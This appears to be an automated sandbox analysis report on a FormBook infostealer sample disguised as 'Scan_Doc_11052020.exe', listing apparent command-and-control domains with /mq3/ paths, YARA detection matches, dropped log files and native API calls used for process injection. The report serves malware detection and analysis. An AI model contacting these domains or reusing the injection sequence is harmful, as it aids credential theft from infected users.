Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.axcyl.com/mq3/www.samdeng.works
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.axcyl.comReferer:
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.brandbank.news
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.brandbank.news/mq3/
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.brandbank.news/mq3/www.shimi783.info
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.brandbank.newsReferer:
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.bridgejfc.com
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.bridgejfc.com/mq3/
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.bridgejfc.com/mq3/www.porcber.com
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.bridgejfc.comReferer:
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.bzasd.com
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.bzasd.com/mq3/
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.bzasd.com/mq3/www.dllearn.com
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.bzasd.comReferer:
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.carnescolombia.services
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.carnescolombia.services/mq3/
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.carnescolombia.services/mq3/www.bridgejfc.com
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.carnescolombia.servicesReferer:
Source: explorer.exe, 00000002.00000000.820703019.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.dearisorealestate.com
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.dearisorealestate.com/mq3/
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.dearisorealestate.com/mq3/www.r2019.biz
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.dearisorealestate.comReferer:
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.dllearn.com
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.dllearn.com/mq3/
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.dllearn.com/mq3/www.axcyl.com
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.dllearn.comReferer:
Source: explorer.exe, 00000002.00000000.820703019.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000002.00000000.820703019.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000002.00000000.820703019.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000002.00000000.820703019.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000002.00000000.820703019.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.hellsoasis.net
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.hellsoasis.net/mq3/
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.hellsoasis.net/mq3/www.meetlove94.life
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.hellsoasis.netReferer:
Source: explorer.exe, 00000002.00000000.820703019.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.meetlove94.life
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.meetlove94.life/mq3/
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.meetlove94.lifeReferer:
Source: systray.exe, 00000004.00000002.1201505195.00000000056DF000.00000004.00000001.sdmpString found in binary or memory: http://www.mipcms.com
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.mymtaporta.com
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.mymtaporta.com/mq3/
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.mymtaporta.com/mq3/www.smsjtj.com
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.mymtaporta.comReferer:
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.porcber.com
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.porcber.com/mq3/
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.porcber.com/mq3/www.hellsoasis.net
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.porcber.comReferer:
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.r2019.biz
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.r2019.biz/mq3/
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.r2019.biz/mq3/www.mymtaporta.com
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.r2019.bizReferer:
Source: explorer.exe, 00000002.00000000.820703019.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000002.00000000.820703019.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.samdeng.works
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.samdeng.works/mq3/
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.samdeng.works/mq3/www.xavnzfw.com
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.samdeng.worksReferer:
Source: explorer.exe, 00000002.00000000.820703019.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.shimi783.info
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.shimi783.info/mq3/
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.shimi783.info/mq3/www.dearisorealestate.com
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.shimi783.infoReferer:
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.smsjtj.com
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.smsjtj.com/mq3/
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.smsjtj.com/mq3/www.carnescolombia.services
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.smsjtj.comReferer:
Source: explorer.exe, 00000002.00000000.820703019.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000002.00000000.820703019.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.xavnzfw.com
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.xavnzfw.com/mq3/
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.xavnzfw.com/mq3/www.brandbank.news
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.xavnzfw.comReferer:
Source: explorer.exe, 00000002.00000000.820703019.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
Source: systray.exe, 00000004.00000002.1201505195.00000000056DF000.00000004.00000001.sdmpString found in binary or memory: https://m.baidu.com/
Source: systray.exe, 00000004.00000002.1201505195.00000000056DF000.00000004.00000001.sdmpString found in binary or memory: https://mipcache.bdstatic.com/static/v1/mip-stats-baidu/mip-stats-baidu.js
Source: systray.exe, 00000004.00000002.1201505195.00000000056DF000.00000004.00000001.sdmpString found in binary or memory: https://mipcache.bdstatic.com/static/v1/mip.css
Source: systray.exe, 00000004.00000002.1201505195.00000000056DF000.00000004.00000001.sdmpString found in binary or memory: https://mipcache.bdstatic.com/static/v1/mip.js

E-Banking Fraud:

barindex
Yara detected FormBookShow sources
Source: Yara matchFile source: 0000000F.00000002.1123596075.00000000050C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000002.1194591234.0000000000B20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000002.1122903967.0000000004EB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.857272679.0000000005510000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000E.00000002.1123325288.0000000005310000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000002.1120293845.00000000037A5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.859171433.0000000005650000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000E.00000002.1123113610.00000000051E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000002.1122759975.0000000004D70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.860529111.0000000005680000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000E.00000002.1120571214.0000000003C25000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000002.1194734032.0000000000B90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000002.1194902186.0000000000BD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000011.00000002.1115593061.0000000000F00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000E.00000002.1123910075.0000000005600000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.850402740.0000000003EE5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 15.2.vrhdctut50jxtp.exe.4d70000.3.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 14.2.vrhdctut50jxtp.exe.51e0000.3.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 15.2.vrhdctut50jxtp.exe.4d70000.3.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 0.2.Scan_Doc_11052020.exe.5510000.3.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 0.2.Scan_Doc_11052020.exe.5510000.3.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 14.2.vrhdctut50jxtp.exe.51e0000.3.raw.unpack, type: UNPACKEDPE

System Summary:

barindex
Detected FormBook malwareShow sources
Source: C:\Windows\SysWOW64\systray.exeDropped file: C:\Users\user\AppData\Roaming\72R9-CPB\72Rlogri.iniJump to dropped file
Source: C:\Windows\SysWOW64\systray.exeDropped file: C:\Users\user\AppData\Roaming\72R9-CPB\72Rlogrf.iniJump to dropped file
Source: C:\Windows\SysWOW64\systray.exeDropped file: C:\Users\user\AppData\Roaming\72R9-CPB\72Rlogrv.iniJump to dropped file
Malicious sample detected (through community Yara rule)Show sources
Source: 0000000F.00000002.1123596075.00000000050C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.1123596075.00000000050C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.1194591234.0000000000B20000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.1194591234.0000000000B20000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.1122903967.0000000004EB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.1122903967.0000000004EB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.857272679.0000000005510000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.857272679.0000000005510000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.1123325288.0000000005310000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.1123325288.0000000005310000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.1120293845.00000000037A5000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.1120293845.00000000037A5000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.859171433.0000000005650000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.859171433.0000000005650000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.1123113610.00000000051E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.1123113610.00000000051E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.1122759975.0000000004D70000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.1122759975.0000000004D70000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.860529111.0000000005680000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.860529111.0000000005680000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.1120571214.0000000003C25000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.1120571214.0000000003C25000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.1194734032.0000000000B90000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.1194734032.0000000000B90000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.1194902186.0000000000BD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.1194902186.0000000000BD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.1115593061.0000000000F00000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.1115593061.0000000000F00000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.1123910075.0000000005600000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.1123910075.0000000005600000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.850402740.0000000003EE5000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.850402740.0000000003EE5000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 15.2.vrhdctut50jxtp.exe.4d70000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 15.2.vrhdctut50jxtp.exe.4d70000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 14.2.vrhdctut50jxtp.exe.51e0000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 14.2.vrhdctut50jxtp.exe.51e0000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 15.2.vrhdctut50jxtp.exe.4d70000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 15.2.vrhdctut50jxtp.exe.4d70000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Scan_Doc_11052020.exe.5510000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Scan_Doc_11052020.exe.5510000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Scan_Doc_11052020.exe.5510000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Scan_Doc_11052020.exe.5510000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 14.2.vrhdctut50jxtp.exe.51e0000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 14.2.vrhdctut50jxtp.exe.51e0000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Initial sample is a PE file and has a suspicious nameShow sources
Source: initial sampleStatic PE information: Filename: Scan_Doc_11052020.exe
Contains functionality to call native functionsShow sources
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F0A5F0 NtReadVirtualMemory,LdrInitializeThunk,0_2_05F0A5F0
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F0A560 NtQuerySystemInformation,LdrInitializeThunk,0_2_05F0A560
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F0A540 NtDelayExecution,LdrInitializeThunk,0_2_05F0A540
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F0A4A0 NtUnmapViewOfSection,LdrInitializeThunk,0_2_05F0A4A0
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F0A480 NtMapViewOfSection,LdrInitializeThunk,0_2_05F0A480
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F0A410 NtQueryInformationToken,LdrInitializeThunk,0_2_05F0A410
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F0A750 NtCreateFile,LdrInitializeThunk,0_2_05F0A750
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F0A720 NtResumeThread,LdrInitializeThunk,0_2_05F0A720
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F0A700 NtProtectVirtualMemory,LdrInitializeThunk,0_2_05F0A700
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F0A6A0 NtCreateSection,LdrInitializeThunk,0_2_05F0A6A0
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F0A610 NtAdjustPrivilegesToken,LdrInitializeThunk,0_2_05F0A610
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F0A3E0 NtFreeVirtualMemory,LdrInitializeThunk,0_2_05F0A3E0
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F0A360 NtAllocateVirtualMemory,LdrInitializeThunk,0_2_05F0A360
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F0A2D0 NtClose,LdrInitializeThunk,0_2_05F0A2D0
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F0A240 NtReadFile,LdrInitializeThunk,0_2_05F0A240
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F0A5A0 NtWriteVirtualMemory,0_2_05F0A5A0
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F0BD40 NtSuspendThread,0_2_05F0BD40
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F0A520 NtEnumerateKey,0_2_05F0A520
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F0ACE0 NtCreateMutant,0_2_05F0ACE0
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F0B470 NtOpenThread,0_2_05F0B470
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F0A470 NtSetInformationFile,0_2_05F0A470
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F0A460 NtOpenProcess,0_2_05F0A460
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F0A430 NtQueryVirtualMemory,0_2_05F0A430
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F0B410 NtOpenProcessToken,0_2_05F0B410
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F0A780 NtOpenDirectoryObject,0_2_05F0A780
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F0A710 NtQuerySection,0_2_05F0A710
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F0A6D0 NtCreateProcessEx,0_2_05F0A6D0
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F0A650 NtQueueApcThread,0_2_05F0A650
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F0B0B0 NtGetContextThread,0_2_05F0B0B0
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F0A800 NtSetValueKey,0_2_05F0A800
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F0A3D0 NtCreateKey,0_2_05F0A3D0
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F0A370 NtQueryInformationProcess,0_2_05F0A370
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F0A350 NtQueryValueKey,0_2_05F0A350
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F0A310 NtEnumerateValueKey,0_2_05F0A310
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F0A2F0 NtQueryInformationFile,0_2_05F0A2F0
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F0A260 NtWriteFile,0_2_05F0A260
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F0BA30 NtSetContextThread,0_2_05F0BA30
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F0A220 NtWaitForSingleObject,0_2_05F0A220
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DAACE0 NtCreateMutant,LdrInitializeThunk,4_2_04DAACE0
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DAA480 NtMapViewOfSection,LdrInitializeThunk,4_2_04DAA480
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DAA470 NtSetInformationFile,LdrInitializeThunk,4_2_04DAA470
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DAA410 NtQueryInformationToken,LdrInitializeThunk,4_2_04DAA410
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DAA540 NtDelayExecution,LdrInitializeThunk,4_2_04DAA540
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DAA560 NtQuerySystemInformation,LdrInitializeThunk,4_2_04DAA560
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DAA6A0 NtCreateSection,LdrInitializeThunk,4_2_04DAA6A0
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DAA610 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_04DAA610
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DAA750 NtCreateFile,LdrInitializeThunk,4_2_04DAA750
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DAA800 NtSetValueKey,LdrInitializeThunk,4_2_04DAA800
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DAA2D0 NtClose,LdrInitializeThunk,4_2_04DAA2D0
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DAA240 NtReadFile,LdrInitializeThunk,4_2_04DAA240
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DAA260 NtWriteFile,LdrInitializeThunk,4_2_04DAA260
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DAA3D0 NtCreateKey,LdrInitializeThunk,4_2_04DAA3D0
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DAA3E0 NtFreeVirtualMemory,LdrInitializeThunk,4_2_04DAA3E0
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DAA350 NtQueryValueKey,LdrInitializeThunk,4_2_04DAA350
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DAA360 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_04DAA360
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DAA310 NtEnumerateValueKey,LdrInitializeThunk,4_2_04DAA310
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DAA4A0 NtUnmapViewOfSection,4_2_04DAA4A0
